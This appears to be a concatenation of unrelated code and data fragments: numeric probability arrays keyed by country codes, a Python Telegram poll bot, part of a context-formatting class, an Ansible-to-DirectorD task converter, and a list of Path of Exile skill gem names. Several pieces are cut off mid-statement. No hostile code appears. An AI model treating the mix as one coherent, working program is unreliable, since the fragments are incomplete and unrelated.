0.004177176840737064,
0.004528461261533232,
0.011986165210919286,
0.020913229163362596,
0.026256192047909205,
0.06020088795683667,
0.10083356435185266,
0.20383598870565692,
0.36011223656520674,
0.48340879482276744,
0.5077279755786019,
0.5098598636990203,
0.509964987826742,
0.5099683792910672,
0.6970350781515022,
0.7708296581020784,
0.8827914894802898,
0.8924950516558052,
0.9219397234132889,
0.9666134565859161,
0.9672514378506456,
0.9701552913924072,
0.9789667992513171,
0.9923357019234077,
0.9923615436619295,
0.9925194157093155,
0.9932459605022319,
0.9954995172846061,
1.0],
'GER': [0.00017144759983059532,
0.00037176051865301307,
0.0005092813662985237,
0.0005730367552864531,
0.0005953201417168908,
0.0015921631944930742,
0.0029967425484992974,
0.003986288072343913,
0.004451053717169879,
0.010495740672117507,
0.01901287130236576,
0.025013307281381774,
0.052503773519940594,
0.09123859862921925,
0.17458735759125532,
0.3009405369121568,
0.4183812370244567,
0.4456704554616094,
0.44848871538985313,
0.4486524322927688,
0.4486586792251214,
0.6266937936726023,
0.7094323863920771,
0.8348605795989432,
0.8476776667345235,
0.8865379864172973,
0.9454485809179489,
0.9464413324093723,
0.9509562397257743,
0.9646450552731404,
0.9853967183703066,
0.9854443162626187,
0.9857352070455746,
0.9870754641922909,
0.9912454548380962,
1.0],
'ICE': [0.0039437550110208615,
0.006241466155502256,
0.007106607147634448,
0.0073265377623919865,
0.007368684812040395,
0.01898664966379224,
0.02796127846790154,
0.03142763265296362,
0.0323201940872442,
0.07151803578029768,
0.1017975282392845,
0.11349265766443753,
0.2126798311280843,
0.28929979644247444,
0.4566235563703249,
0.5977569290571388,
0.7270109468323708,
0.7566045872183932,
| |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Notes:
InlineKeyboardButton:
callback_data:
has a common format of ".method_name param1 param2 ...".
currently used methods are:
- .vote <poll_id> <answer_id>
vote for an answer <answer_id> in poll <poll_id>.
- .update <poll_id>
update poll view in private chat with poll's owner.
- .admin_vote <poll_id>
poll's owner want to vote him/herself, show keyboard with answers.
- .stats <poll_id>
upload statistics in json to poll's owner.
"""
import json
import re
import sys
import urllib.parse
import warnings
from io import BytesIO
from typing import Callable, List, Optional, TypeVar
from uuid import uuid4
from dotenv import load_dotenv
from telegram import (
CallbackQuery,
InlineKeyboardButton,
InlineKeyboardMarkup,
InlineQuery,
InlineQueryResultArticle,
InputTextMessageContent,
Message,
Update,
User,
)
from telegram.ext import (
CallbackContext,
CallbackQueryHandler,
CommandHandler,
ConversationHandler,
Dispatcher,
Filters,
InlineQueryHandler,
MessageHandler,
Updater,
)
from . import log
from .config import Configuration
from .filters import FiltersExt
from .model.answer import Answer
from .model.poll import MAX_ANSWERS, MAX_POLLS_PER_USER, Poll
from .paginate import paginate
from .state import PersistentConversationHandler, StateManager
from .util import ignore_not_modified
T = TypeVar('T')
logger = log.getLogger(__name__)
logger.setLevel(log.INFO)
POLLS_PER_PAGE = 5
###############################################################################
# utils
###############################################################################
HandlerCallback = Callable[[Update, CallbackContext], Optional[int]]
def inline_keyboard_markup_answers(poll: Poll) -> InlineKeyboardMarkup:
def text(title: str, count: int):
if count == 0:
return title
else:
return "{} - {}".format(title, count)
keyboard = [
[InlineKeyboardButton(
text(answer.text, len(answer.voters())),
callback_data=".vote {} {}".format(poll.id, answer.id))]
for answer in poll.answers()]
return InlineKeyboardMarkup(keyboard)
def inline_keyboard_markup_admin(poll: Poll) -> InlineKeyboardMarkup:
keyboard = [
[InlineKeyboardButton("publish", switch_inline_query=str(poll.id))],
[InlineKeyboardButton("share link", callback_data=".share {}".format(poll.id))],
[
InlineKeyboardButton("update", callback_data=".update {}".format(poll.id)),
InlineKeyboardButton("vote", callback_data=".admin_vote {}".format(poll.id))],
[InlineKeyboardButton("statistics", callback_data=".stats {}".format(poll.id))],
]
return InlineKeyboardMarkup(keyboard)
def send_vote_poll(message: Message, poll: Poll):
markup = inline_keyboard_markup_answers(poll)
message.reply_text(
str(poll),
parse_mode='MarkdownV2',
disable_web_page_preview=True,
reply_markup=markup
)
def send_admin_poll(message: Message, poll: Poll):
markup = inline_keyboard_markup_admin(poll)
message.reply_text(
str(poll),
parse_mode='MarkdownV2',
disable_web_page_preview=True,
reply_markup=markup)
###############################################################################
# handlers: global
###############################################################################
def error(update: Update, context: CallbackContext):
import traceback
logger.warning('Update "%s" caused error "%s"' % (update, context.error))
traceback.print_exc(file=sys.stdout)
def about(update: Update, context: CallbackContext):
message: Message = update.message
message.reply_text(
"This bot will help you create multiple-choice polls. "
"Use /start to create a multiple-choice poll here, "
"then publish it to groups or send it to individual friends.")
def manage(update: Update, context: CallbackContext):
message: Message = update.message
user_id = message.from_user.id
polls = Poll.query(user_id, limit=MAX_POLLS_PER_USER)
if len(polls) == 0:
message.reply_text(
text="you don't have any polls yet.",
reply_markup=InlineKeyboardMarkup(
[[InlineKeyboardButton("create new poll", callback_data=".start")]]))
else:
message.reply_text(
manage_polls_message(polls, 0, POLLS_PER_PAGE),
parse_mode=None,
disable_web_page_preview=True,
reply_markup=paginate(len(polls), 0, POLLS_PER_PAGE,
manage_polls_callback_data))
def manage_polls_callback_data(offset):
return '.manage {}'.format(offset)
def manage_polls_message(polls: List[Poll], offset: int, count: int) -> str:
text = "your polls\n\n{}".format(
"\n\n".join(
"{}. {}\n/view_{}".format(i + 1, poll.topic, poll.id)
for i, poll in
enumerate(polls[offset: offset + count], start=offset))
)
return text
def start_with_poll(update: Update, context: CallbackContext):
message: Message = update.message
poll_id = int(context.match.groups()[0])
poll = Poll.load(poll_id)
send_vote_poll(message, poll)
def view_poll(update: Update, context: CallbackContext):
message: Message = update.message
poll_id = int(context.match.groups()[0])
poll = Poll.load(poll_id)
if poll.owner.id == message.from_user.id:
send_admin_poll(message, poll)
###############################################################################
# conversation: create new poll
###############################################################################
QUESTION, FIRST_ANSWER, ANSWERS, = range(3)
states = StateManager()
def start_from_command(update: Update, context: CallbackContext) -> int:
message: Message = update.message
user = message.from_user
return start_with_user(user, context)
def start_from_callback_query(update: Update, context: CallbackContext) -> int:
query: CallbackQuery = update.callback_query
query.answer()
user = query.from_user
return start_with_user(user, context)
def start_with_user(user: User, context: CallbackContext) -> int:
context.bot.send_message(user.id, "ok, let's create a new poll. send me a question first.")
states[user].reset()
return QUESTION
def add_question(update: Update, context: CallbackContext) -> int:
message: Message = update.message
states[message.from_user].add_question(message.text)
message.reply_text("creating a new poll: '{}'\n\n"
"please send me the first answer option".format(message.text))
return FIRST_ANSWER
def add_answer(update: Update, context: CallbackContext) -> int:
message: Message = update.message
poll: Poll = states[message.from_user].add_answer(update.message.text)
if len(poll.answers()) == MAX_ANSWERS:
return create_poll(update, context)
else:
message.reply_text(
"nice. feel free to add more answer options.\n\n"
"when you've added enough, simply send /done.")
return ANSWERS
def create_poll(update: Update, context: CallbackContext) -> int:
message: Message = update.message
poll = states[message.from_user].create_poll()
poll.store()
logger.debug("user id %d created poll id %d", message.from_user.id, poll.id)
message.reply_text(
"poll created. "
"now you can publish it to a group or send it to your friend in a private message.")
send_admin_poll(message, poll)
return ConversationHandler.END
def cancel(update: Update, context: CallbackContext) -> int:
message: Message = update.message
states[message.from_user].reset()
message.reply_text(
"the command has been cancelled. just send me something if you want to start.")
return ConversationHandler.END
def cancel_nothing(update: Update, context: CallbackContext):
message: Message = update.message
message.reply_text(
"nothing to cancel anyway. just send me something if you want to start.")
###############################################################################
# handlers: inline
###############################################################################
def inline_query(update: Update, context: CallbackContext):
inline_query: InlineQuery = update.inline_query
query: str = inline_query.query
polls: List[Poll] = Poll.query(inline_query.from_user.id, query)
results = []
for poll in polls:
results.append(
InlineQueryResultArticle(
id=str(uuid4()),
title=poll.topic,
input_message_content=InputTextMessageContent(
message_text=str(poll),
parse_mode='MarkdownV2',
disable_web_page_preview=True),
description=" / ".join(answer.text for answer in poll.answers()),
reply_markup=inline_keyboard_markup_answers(poll)))
inline_query.answer(
results,
is_personal=True,
cache_time=30,
switch_pm_text="Create new poll",
switch_pm_parameter="new_poll")
###############################################################################
# handlers: callback query
###############################################################################
def callback_query_vote(update: Update, context: CallbackContext):
query: CallbackQuery = update.callback_query
poll_id, answer_id = map(int, context.match.groups())
answer: Optional[Answer] = None
# cases:
# - 0, error: poll / answer not found due to system fault of fraud attempt
# - 1, set: user don't have active vote in this answer in this poll
# - 2, reset: user has active vote in this answer in this poll.
poll = Poll.load(poll_id)
if poll is not None:
answer: Answer = next((a for a in poll.answers() if a.id == answer_id), None)
if answer is None:
# case 0, error
logger.debug("poll not found, query data %r from user id %d", query.data, query.from_user.id)
query.answer(text="sorry, this poll not found. probably it has been closed.")
with ignore_not_modified():
query.edit_message_reply_markup(reply_markup=InlineKeyboardMarkup([]))
else:
poll: Poll = answer.poll()
user: User = query.from_user
user_old = next(iter(u for u in answer.voters() if u.id == user.id), None)
if user_old is None:
# case 1, set
logger.debug("user id %d voted for answer id %d in poll id %d",
query.from_user.id, answer.id, answer.poll().id)
answer.voters().append(user)
answer.store()
query.answer(text="you voted for '{}'.".format(answer.text))
else:
# case 2, reset
logger.debug("user id %d took his/her reaction back from answer id %d in poll id %d",
query.from_user.id, answer.id, answer.poll().id)
answer.voters().remove(user_old)
answer.store()
query.answer(text="you took your reaction back.")
# in both cases 1 and 2 update the view
if query.message is not None and poll.owner.id == query.message.chat.id:
markup = inline_keyboard_markup_admin(poll)
else:
markup = inline_keyboard_markup_answers(poll)
with ignore_not_modified():
query.edit_message_text(
text=str(poll),
parse_mode='MarkdownV2',
disable_web_page_preview=True,
reply_markup=markup)
def callback_query_admin_vote(update: Update, context: CallbackContext):
query: CallbackQuery = update.callback_query
poll_id = int(context.match.groups()[0])
poll = Poll.load(poll_id)
logger.debug("owner user id %d want to vote in poll id %d", query.from_user.id, poll.id)
with ignore_not_modified():
query.edit_message_reply_markup(reply_markup=inline_keyboard_markup_answers(poll))
def callback_query_update(update: Update, context: CallbackContext):
query: CallbackQuery = update.callback_query
poll_id = int(context.match.groups()[0])
poll = Poll.load(poll_id)
query.answer(text='\u2705 results updated.')
with ignore_not_modified():
query.edit_message_text(
text=str(poll),
parse_mode='MarkdownV2',
disable_web_page_preview=True,
reply_markup=inline_keyboard_markup_admin(poll))
def callback_query_stats(update: Update, context: CallbackContext):
"""
generate json file and send it back to poll's owner.
"""
query: CallbackQuery = update.callback_query
poll_id = int(context.match.groups()[0])
poll = Poll.load(poll_id)
if poll.owner.id != query.from_user.id:
logger.debug("user id %d attempted to access stats on poll id %d owner %d",
query.from_user.id, poll.id, poll.owner.id)
return
message: Message = query.message
# select
data = {
'answers': [{
'id': answer.id,
'text': answer.text,
'voters': {
'total': len(answer.voters()),
'_': [{
k: v
for k, v in {
'id': voter.id,
'first_name': voter.first_name,
'last_name': voter.last_name,
'username': voter.username,
}.items()
if v
} for voter in answer.voters()]
}
} for answer in poll.answers()]
}
content = json.dumps(data, indent=4, ensure_ascii=False)
raw = BytesIO(content.encode('utf-8'))
name = "statistics for poll #{}.json".format(poll.id)
context.bot.send_document(poll.owner.id, raw, filename=name)
query.answer()
def callback_query_manage(update: Update, context: CallbackContext):
query: CallbackQuery = update.callback_query
offset = int(context.match.groups()[0])
polls: List[Poll] = Poll.query(query.from_user.id, limit=MAX_POLLS_PER_USER)
with ignore_not_modified():
query.edit_message_text(
text=manage_polls_message(polls, offset, POLLS_PER_PAGE),
parse_mode=None,
disable_web_page_preview=True,
reply_markup=paginate(len(polls), offset, POLLS_PER_PAGE,
manage_polls_callback_data))
def callback_query_share(update: Update, context: CallbackContext):
query: CallbackQuery = update.callback_query
poll_id = context.match.groups()[0]
context.bot.send_message(
query.from_user.id,
"https://t.me/{}?start=poll_id={}".format(context.bot.username, poll_id),
parse_mode=None,
disable_web_page_preview=True,
)
query.answer()
def callback_query_not_found(update: Update, context: CallbackContext):
query: CallbackQuery = update.callback_query
logger.debug("invalid callback query data %r from user id %d", query.data, query.from_user.id)
query.answer("invalid query")
def get_updater(token: str) -> Updater:
updater = Updater(token, use_context=True)
return updater
def configure_updater(updater: Updater):
# Get the dispatcher to register handlers
dp: Dispatcher = updater.dispatcher
dp.add_handler(MessageHandler(Filters.regex(r"/start poll_id=(.+)"), start_with_poll))
with warnings.catch_warnings():
# see per_message param below
warnings.filterwarnings("ignore", category=UserWarning, module=re.escape(ConversationHandler.__module__))
dp.add_handler(PersistentConversationHandler(
entry_points=[
CommandHandler("start", start_from_command),
CallbackQueryHandler(start_from_callback_query, pattern=r"\.start"),
# we sacrifice the ability to use /start as a reentry point, but we
# gain from avoiding certain dirty hack with internals of
# conversation handler's implementation details.
MessageHandler(FiltersExt.non_command_text, add_question),
],
allow_reentry=False,
states={
QUESTION: [
MessageHandler(FiltersExt.non_command_text, add_question)],
FIRST_ANSWER: [
MessageHandler(FiltersExt.non_command_text, add_answer)],
ANSWERS: [
MessageHandler(FiltersExt.non_command_text, add_answer),
CommandHandler("done", create_poll),
]
},
fallbacks=[
# entry points can still be used as reentry-points, but in a form of fallbacks
CommandHandler("start", start_from_command),
CallbackQueryHandler(start_from_callback_query, pattern=r"\.start"),
# just a normal "`break` from the loop"
CommandHandler("cancel", cancel),
],
per_chat=True,
| |
default: if value is None, set to this
out_type: cast return as this type
Returns:
Formatted value of type out_type
"""
if value is None:
value = default
if isinstance(value, SpecialTagDirective):
result = value.get_value(self)
return types.cast_to_type(result, out_type)
if isinstance(value, str):
result = self.formatter.vformat(value, None, self)
result_type = type(result)
if out_type is result_type:
# no need to cast, result is already desired type.
return result
elif out_type is bool:
# casting a str to bool is always True, hence special case. If
# the str value is 'False'/'false', presumably user can
# reasonably expect a bool False response.
return types.cast_to_bool(result)
else:
return out_type(result)
else:
return out_type(value)
def get_formatted_value(self, input_value):
"""Run token substitution on the input against context.
If input_value is a formattable string or SpecialTagDirective,
will return the formatted result.
If input_value is an iterable, will iterate input recursively and
format all formattable objects it finds. Mappings will format both key
and value.
If input_value is not a string with a formatting expression such as
'mystring{expr}morestring' and not iterable, will just return the input
object. E.g An int input will return the same int.
Choosing between get_formatted() and get_formatted_value():
- get_formatted gets a context[key] value with formatting applied.
- get_formatted_value is for any input object.
An input string with a single formatting expression and nothing else
will return the object at that context path:
input_value = '{key1}'.
This means that the return obj will be the same type as the source
object. This return object in itself has token substitions run on it
iteratively.
By comparison, multiple formatting expressions and/or the inclusion
of literal text will result in a string return type:
input_value = '{key1} literal text {key2}'
Then this will return string: "Piping down the valleys wild"
This is not a full on deepcopy, and it's on purpose not a full on
deepcopy. It will handle dict, list, set, tuple for iteration, without
any especial cuteness for other types or types not derived from these.
Returns:
Iterable identical in structure to the input iterable, except
where formatting changed a value from a string to the
formatting expression's evaluated value.
Args:
input_value: Any object to format.
Returns:
any given type: Formatted value with {substitutions} made from
context. If input was not a string, will just return input_value
untouched.
"""
return self.formatter.vformat(input_value, None, self)
def get_processed_string(self, input_string):
"""Use get_formatted_value(input_value) instead. Deprecated."""
from warnings import warn
warn(
("Use get_formatted_value(input_value) instead of "
"get_processed_string"),
DeprecationWarning)
return self.formatter.vformat(input_string, None, self)
def iter_formatted_strings(self, iterable_strings):
"""Yield a formatted string from iterable_strings.
If iterable_strings[0] = 'Piping {key1} the {key2} wild'
And context = {'key1': 'down', 'key2': 'valleys', 'key3': 'value3'}
Then the 1st yield is: "Piping down the valleys wild"
Args:
iterable: Iterable containing strings. E.g a file-like object.
Returns:
Yields formatted line.
"""
for string in iterable_strings:
yield self.formatter.vformat(string, None, self)
def keys_exist(self, *keys):
"""Check if keys exist in context.
Args:
*keys: *args of str for keys to check in context.
Returns:
tuple(bool) where bool indicates the key does exist in context,
same order as *keys.
Sample:
k1, = context.keys_exist('k1')
k1, k2, k3 = context.keys_exist('k1', 'k2', 'k3')
"""
return tuple(key in self.keys() for key in keys)
def keys_of_type_exist(self, *keys):
"""Check if keys exist in context and if types are as expected.
Args:
*keys: *args for keys to check in context.
Each arg is a tuple(str, type)
Returns:
Tuple of namedtuple ContextItemInfo, same order as *keys.
ContextItemInfo(key,
key_in_context,
expected_type,
is_expected_type)
Remember if there is only one key in keys, the return assignment
needs an extra comma to remind python that it's a tuple:
# one
a, = context.keys_of_type_exist('a')
# > 1
a, b = context.keys_of_type_exist('a', 'b')
"""
# k[0] = key name, k[1] = exists, k2 = expected type
keys_exist = [(key, key in self.keys(), expected_type)
for key, expected_type in keys]
return tuple(ContextItemInfo(
key=k[0],
key_in_context=k[1],
expected_type=k[2],
is_expected_type=isinstance(self[k[0]], k[2])
if k[1] else None,
has_value=k[1] and not self[k[0]] is None
) for k in keys_exist)
def merge(self, add_me):
"""Merge add_me into context and applies interpolation.
Bottom-up merge where add_me merges into context. Applies string
interpolation where the type is a string. Where a key exists in
context already, add_me's value will overwrite what's in context
already.
Supports nested hierarchy. add_me can contains dicts/lists/enumerables
that contain other enumerables et. It doesn't restrict levels of
nesting, so if you really want to go crazy with the levels you can, but
you might blow your stack.
If something from add_me exists in context already, but add_me's value
is of a different type, add_me will overwrite context. Do note this.
i.e if you had context['int_key'] == 1 and
add_me['int_key'] == 'clearly not a number', the end result would be
context['int_key'] == 'clearly not a number'
If add_me contains lists/sets/tuples, this merges these
additively, meaning it appends values from add_me to the existing
sequence.
Args:
add_me: dict. Merge this dict into context.
Returns:
None. All operations mutate this instance of context.
"""
def merge_recurse(current, add_me):
"""Walk the current context tree in recursive inner function.
On 1st iteration, current = self(i.e root of context)
On subsequent recursive iterations, current is wherever you're at
in the nested context hierarchy.
Args:
current: dict. Destination of merge.
add_me: dict. Merge this to current.
"""
for k, v in add_me.items():
# key supports interpolation
k = self.get_formatted_value(k)
# str not mergable, so it doesn't matter if it exists in dest
if isinstance(v, (str, SpecialTagDirective)):
# just overwrite dest - str adds/edits indiscriminately
current[k] = self.get_formatted_value(v)
elif isinstance(v, (bytes, bytearray)):
# bytes aren't mergable or formattable
# only here to prevent the elif on enumerables catching it
current[k] = v
# deal with things that are mergable - exists already in dest
elif k in current:
if types.are_all_this_type(Mapping, current[k], v):
# it's dict-y, thus recurse through it to merge since
# it exists in dest
merge_recurse(current[k], v)
elif types.are_all_this_type(list, current[k], v):
# it's list-y. Extend mutates existing list since it
# exists in dest
current[k].extend(
self.get_formatted_value(v))
elif types.are_all_this_type(tuple, current[k], v):
# concatenate tuples
current[k] = (
current[k] + self.get_formatted_value(v))
elif types.are_all_this_type(Set, current[k], v):
# join sets
current[k] = (
current[k] | self.get_formatted_value(v))
else:
# at this point it's not mergable
current[k] = self.get_formatted_value(v)
else:
# at this point it's not mergable, nor in context
current[k] = self.get_formatted_value(v)
# first iteration starts at context dict root
merge_recurse(self, add_me)
def pystring_globals_clear(self):
"""Clear the pystring globals namespace."""
self._pystring_globals.clear()
def pystring_globals_update(self, *args, **kwargs):
"""Update the pystring globals namespace with values from other.
Args:
*args/**kwargs:
- iterable of key/value pairs
- dict
Returns:
Length of updated pystring globals.
"""
# pystring_globals initialized to {} on Context init, no None worries.
self._pystring_globals.update(*args, **kwargs)
return len(self._pystring_globals)
def set_defaults(self, defaults):
"""Set defaults in context if keys do not exist already.
Adds the input dict(defaults) into the context, only where keys in
defaults do not already exist in context. Supports nested hierarchies.
Example:
Given a context like this:
key1: value1
key2:
key2.1: value2.1
key3: None
And defaults input like this:
key1: 'updated value here won't overwrite since it already exists'
key2:
key2.2: value2.2
key3: 'key 3 exists so I won't overwrite
Will result in context:
key1: value1
key2:
key2.1: value2.1
key2.2: value2.2
key3: None
Args:
defaults: dict. Add this dict into context.
Returns:
None. All operations mutate this instance of context.
"""
def defaults_recurse(current, defaults):
"""Walk the current context tree in recursive inner function.
On 1st iteration, current = self(i.e root of context)
On subsequent recursive iterations, current is wherever you're at
in the nested context hierarchy.
Args:
current: dict. Destination of merge.
defaults: dict. Add this to current if keys don't exist
already.
"""
for k, v in defaults.items():
# key supports interpolation
k = self.get_formatted_value(k)
if k in current:
if types.are_all_this_type(Mapping, current[k], v):
# it's dict-y, thus recurse through it to check if it
# contains child items that | |
# Copyright <NAME> <<EMAIL>>. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from ruamel.yaml.comments import CommentedMap as Map
from a2dd.constants import BLOCK_ATTRS, PLAYBOOK_ATTRS, TASK_ATTRS
from a2dd.utils import get_task_action, yaml_dump, yaml_load, string2dict
class AnsibleTask:
"""AnsibleTask class parses a single task."""
def __init__(self, task, block=None, include=None, role=None, play=None):
"""Set context for task.
Args:
task (dict): Task loaded from YAML to parse
block (dict, optional): Block context. Defaults to None.
include (dict, optional): Include context. Defaults to None.
role (dict, optional): Role context. Defaults to None.
play (dict, optional): Playbook context. Defaults to None.
"""
self.task = task
self.block = block
self.include = include
self.role = role
self.play = play
def parse(self):
"""Parser for task.
Raises:
ValueError: if task is block or include
Returns:
list: List of DirectorD tasks with comments as ruamel Maps
"""
task_module = get_task_action(self.task)
# Let's assume task names are unique in all collections we use
# Remove collection part of it
if "." in task_module:
new_task_module = task_module.split(".")[-1]
self.task[new_task_module] = self.task.pop(task_module)
task_module = new_task_module
if isinstance(self.task[task_module], str):
self.task[task_module] = string2dict(self.task[task_module])
if task_module in ("block", "include", "include_tasks"):
raise ValueError(
f"Can not parse module {task_module} - "
"use a specific class for it"
)
parsed_attrs = (task_module, "name")
task_args = {
k: v for k, v in self.task.items() if k not in parsed_attrs
}
name = self.task.get("name", "Unnamed task")
func_name = "task_" + task_module
tasks_parsed = []
if not hasattr(self, func_name):
task_context = yaml_dump(self.task)
tasks_parsed = [
Map(
{
"NAME": name,
"ECHO": (
f"Conversion of task module '{task_module}' is not"
" implemented yet!"
),
}
)
]
else:
parsed, task_context = getattr(self, func_name)(task_args)
if parsed:
for each_task in parsed:
named_task = {"NAME": name} # for NAME to be on the top
named_task.update(each_task)
tasks_parsed.append(Map(named_task))
if task_context:
task_context = yaml_dump(task_context)
context = ""
if task_context:
context = f"TASK-CONTEXT:\n{task_context}"
for add_context in (self.block, self.include, self.role, self.play):
if add_context and "context" in add_context:
context = "\n".join([add_context["context"], context])
context = f"\n{context}"
if context:
for task in tasks_parsed:
task.yaml_set_start_comment(context)
return tasks_parsed
def task_shell(self, task_args):
"""Parse shell task.
Args:
task_args (dict): task loaded from YAML
Raises:
ValueError: if shell command is not found in task
Returns:
tuple: (list, list) : List of DirectorD tasks as dictionaries with
list of unparsed lines as comments.
"""
exe = []
action = "shell" if "shell" in self.task else "command"
run = self.task[action]
if isinstance(run, dict):
if "args" in self.task and "cmd" in self.task["args"]:
run = self.task["args"]["cmd"]
if "cmd" in run:
run = run["cmd"]
if not isinstance(run, str):
raise ValueError(f"Can not get shell command from: {self.task}")
if "chdir" in self.task.get("args", {}):
exe.append(f'cd {self.task["args"]["chdir"]};')
elif "chdir" in self.task[action]:
exe.append(f'cd {self.task[action]["chdir"]};')
for env in [
i for i in (self.play, self.block, self.task) if i is not None
]:
if "environment" in env:
for k, v in env["environment"].items():
exe.append(f'export {k}="{v}";')
exe.append(run)
# Not parsed lines go to task-context for future implementation
for i in ("environment", "chdir", "name", "args"):
task_args.pop(i, None)
return [{"RUN": "\n".join(exe)}], task_args
def task_command(self, task_args):
"""Parse command task.
Args:
task_args (dict): task loaded from YAML
Raises:
ValueError: if command is not found in task
Returns:
tuple: (list, list) : List of DirectorD tasks as dictionaries with
list of unparsed lines as comments.
"""
return self.task_shell(task_args)
def task_set_fact(self, task_args):
"""Parse set_fact task.
Args:
task_args (dict): task loaded from YAML
Returns:
tuple: (list, list) : List of DirectorD tasks as dictionaries with
list of unparsed lines as comments.
"""
args = []
for arg in list(self.task["set_fact"].items()):
if arg[0] != "cacheable":
args.append({"ARG": f'{arg[0]} "{arg[1]}"'})
return args, task_args
def task_dnf(self, task_args):
"""Parse dnf task.
Args:
task_args (dict): task loaded from YAML
Returns:
tuple: (list, list) : List of DirectorD tasks as dictionaries with
list of unparsed lines as comments.
"""
args = []
pkgs = self.task["dnf"]["name"]
state = self.task["dnf"].get("state", "present")
if pkgs == "*" and state == "latest":
return [{"RUN": "dnf update -y"}], task_args
if isinstance(pkgs, str):
pkgs = [pkgs]
if state == "latest":
args.append("--latest")
elif state == "absent":
args.append("--absent")
for k, v in self.task["dnf"].items():
if k not in ("name", "state"):
raise ValueError(f"Not implemented key in dnf task: {k}: {v}")
dnf = [{"DNF": " ".join(args + pkgs)}]
return dnf, task_args
def task_setup(self, task_args):
"""Parse setup task.
Args:
task_args (dict): task loaded from YAML
Returns:
tuple: (list, list) : List of DirectorD tasks as dictionaries with
list of unparsed lines as comments.
"""
# We don't have filters now, just run facter for all
setup = [{"FACTER": ""}]
return setup, task_args
def task_service(self, task_args):
"""Parse service task.
Args:
task_args (dict): task loaded from YAML
Returns:
tuple: (list, list) : List of DirectorD tasks as dictionaries with
list of unparsed lines as comments.
"""
servargs = []
names = self.task["service"]["name"]
if isinstance(names, str):
names = [names]
state = self.task["service"].get("state")
if state is not None:
if state == "stopped":
servargs.append("--stopped")
elif state == "restarted":
servargs.append("--restarted")
elif state == "reloaded":
servargs.append("--reloaded")
enabled = self.task["service"].get("enabled")
if enabled is not None:
if enabled:
servargs.append("--enable")
else:
servargs.append("--disable")
service = [{"SERVICE": " ".join(servargs + names)}]
return service, task_args
def task_systemd(self, task_args):
"""Parse service task.
Args:
task_args (dict): task loaded from YAML
Returns:
tuple: (list, list) : List of DirectorD tasks as dictionaries with
list of unparsed lines as comments.
"""
servargs = []
name = self.task["systemd"]["name"]
state = self.task["systemd"].get("state")
if state is not None:
if state == "stopped":
servargs.append("--stopped")
elif state == "restarted":
servargs.append("--restarted")
elif state == "reloaded":
servargs.append("--reloaded")
enabled = self.task["systemd"].get("enabled")
if enabled is not None:
if enabled:
servargs.append("--enable")
else:
servargs.append("--disable")
masked = self.task["systemd"].get("masked")
if masked is not None:
if masked:
servargs.append("--mask")
else:
servargs.append("--unmask")
reload = self.task["systemd"].get(
"daemon_reload", self.task["systemd"].get("daemon-reload")
)
if reload:
servargs.append("--daemon-reload")
service = [{"SERVICE": " ".join(servargs + [name])}]
return service, task_args
class AnsibleBlock:
"""AnsibleBlock class parses a single tasks block."""
def __init__(self, block, **kwargs):
"""Parse a block of tasks, passing all context arguments to tasks.
Args:
block (dict): Dictionary of block loaded from YAML
"""
self.block = block
self.kwargs = kwargs
def add_context(self):
"""Add block context - all options which we don't parse currently.
Returns:
str: Block context as commented lines
"""
block_context = ["## BLOCK-CONTEXT:"]
for part in self.block:
if part in BLOCK_ATTRS and part not in ("block", "environment"):
block_context.append(f"{part}: {self.block[part]}")
return "\n".join(block_context)
def parse(self):
"""Parse block of tasks.
Returns:
list: List of maps with parsed tasks.
"""
result = []
if "environment" in self.block:
for k, v in self.block["environment"].items():
result.append(
Map(
{
"NAME": f"Set block env value for {k}",
"ENV": f"{k} {v}",
}
)
)
self.block["context"] = self.add_context()
result = AnsibleTasksList(
self.block["block"], block=self.block, **self.kwargs
).parse()
return result
class AnsibleIncludeTasks:
"""AnsibleIncludeTasks class parses a tasks file from include block."""
def __init__(self, include, **kwargs):
"""Parse included file of tasks, passing all context argument to tasks.
Args:
include (dict): Dictionary of include task loaded from YAML
"""
self.include = include
self.kwargs = kwargs
def add_context(self):
"""Add inlcude context - all options which we don't parse currently.
Returns:
str: Include context as commented lines
"""
include_context = ["## INCLUDE-CONTEXT:"]
for part in self.include:
if part in TASK_ATTRS and part not in (
"include",
"include_tasks",
"environment",
):
include_context.append(f"{part}: {self.include[part]}")
return "\n".join(include_context)
def parse(self):
"""Parse file with tasks.
Returns:
list: List of maps with parsed tasks.
"""
result = []
if "environment" in self.include:
for k, v in self.include["environment"].items():
result.append(
Map(
{
"NAME": f"Set include env value for {k}",
"ENV": f"{k} {v}",
}
)
)
self.include["context"] = self.add_context()
tasks_file = self.include.get("include") or self.include.get(
"include_tasks"
)
with open(tasks_file, "r", encoding="utf-8") as f:
tasks = yaml_load(f)
result = AnsibleTasksList(
tasks, | |
"Venom Gyre",
"Shrapnel Ballista",
"Awakened Arrow Nova Support",
"Wintertide Brand",
"Awakened Vicious Projectiles Support",
"Frost Shield",
"Crackling Lance",
"Anomalous Essence Drain",
"Divergent Lightning Warp",
"Venom Gyre",
"Onslaught Support",
"Spell Totem Support",
"Infernal Cry",
"Trap Support",
"Poacher's Mark",
"Punishment",
"Wrath",
"Cast when Stunned Support",
"Vaal Discipline",
"Warlord's Mark",
"Intimidating Cry",
"Flammability",
"Righteous Fire",
"Sweep",
"Life Leech Support",
"Storm Burst",
"Berserk",
"Zealotry",
"Spark",
"Explosive Arrow",
"Deadly Ailments Support",
"Additional Accuracy Support",
"Siege Ballista",
"Lesser Poison Support",
"Endurance Charge on Melee Stun Support",
"Vaal Double Strike",
"Flame Wall",
"Melee Physical Damage Support",
"Ancestral Warchief",
"Bloodlust Support",
"Penance Brand",
"Split Arrow",
"Viper Strike",
"Precision",
"Ancestral Call Support",
"Cold Penetration Support",
"Mirage Archer Support",
"Blasphemy Support",
"Summon Skeletons",
"Minion Speed Support",
"Vigilant Strike",
"Dominating Blow",
"Culling Strike Support",
"Void Sphere",
"Ballista Totem Support",
"Blood Rage",
"Fist of War Support",
"Deadly Ailments Support",
"Conductivity",
"Decoy Totem",
"Blind Support",
"Vaal Rain of Arrows",
"Sigil of Power",
"Riposte",
"Vortex",
"Flame Wall",
"Pierce Support",
"Steelskin",
"Swiftbrand Support",
"Ground Slam",
"Cast while Channelling Support",
"Advanced Traps Support",
